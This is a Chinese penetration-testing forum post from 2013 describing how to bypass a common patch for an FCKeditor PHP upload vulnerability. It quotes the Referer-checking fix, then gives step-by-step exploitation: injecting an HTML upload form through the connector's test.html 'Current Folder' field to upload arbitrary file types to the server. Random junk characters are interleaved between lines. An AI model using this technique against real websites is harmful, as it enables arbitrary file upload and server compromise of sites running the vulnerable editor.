中国网络渗透测试联盟
标题:
fckeditor 漏洞修复后的二次利用
[打印本页]
作者:
admin
时间:
2013-1-11 21:12
标题:
fckeditor 漏洞修复后的二次利用
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
/ L. }" ]6 Y: x
网上给出的修复方案是
. y! ]! e$ |6 y; Q2 p* n+ ]
修复方法,删除FCK编辑器用其他的编辑器
4 A3 E6 d) T$ U3 E: C4 W2 A) l
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
- f' D/ c, y$ l' o7 [! \" U9 O
在
% n0 O: e! f, R# y$ c1 T; r: O: ~, p
require(‘config.php’);
5 q z6 h F [* B1 X+ z
require(‘util.php’);
x# F% A; M0 n, Y: O0 R
的下面添加以下代码—————————–
, \# x' @! y, k: D! w; d: e% ?
//防止外部提交
/ f, w, v3 Z& ~5 |
function outsidepost()
. E- M% h z; H/ e( C; X; u: W/ ?
{
% N2 ~& _# I% u9 t* s! u
$servername=$_SERVER['SERVER_NAME'];
& O9 N. {0 N# b, U8 M5 M& E- V) a" N
$sub_from=@$_SERVER['HTTP_REFERER'];
: f/ R" N- V9 G$ O" N- x
$sub_len=strlen($servername);
* E! u# q3 y+ z! l9 V: o- m* w9 U% R
$checkfrom=substr($sub_from,7,$sub_len);
; K* M" X( }5 Z7 g/ K: ?3 T" n
if($checkfrom!=$servername){
- \0 W( ^5 D2 Z7 h& `0 |
echo(“you don’t outsidepost!”);
3 w" S [5 x8 z R
exit;
% s2 g3 U. r3 u! R* j0 n( I( o* o; A0 H
}
3 z: t& y7 M, v1 O. m9 |/ ^4 O
}
$ g! v3 q& Z( P% Q
outsidepost();
6 N* v; H; d: z$ u7 `; I* @8 x
防止外部提交,但是没有防止内部提交,
/ o# o6 I. p0 p% ?; B: |% G
利用方法:
8 ~6 ]/ J) b6 ^0 a/ g
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
0 L0 k& i5 `4 `$ J X" {- v6 n
2,在Current Folder 框输入
( A" d: Y h$ R6 ]% h+ n
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
2 T1 d7 x; ^, f
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
! x& {0 P8 p: N" X( c; Y7 N9 y
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2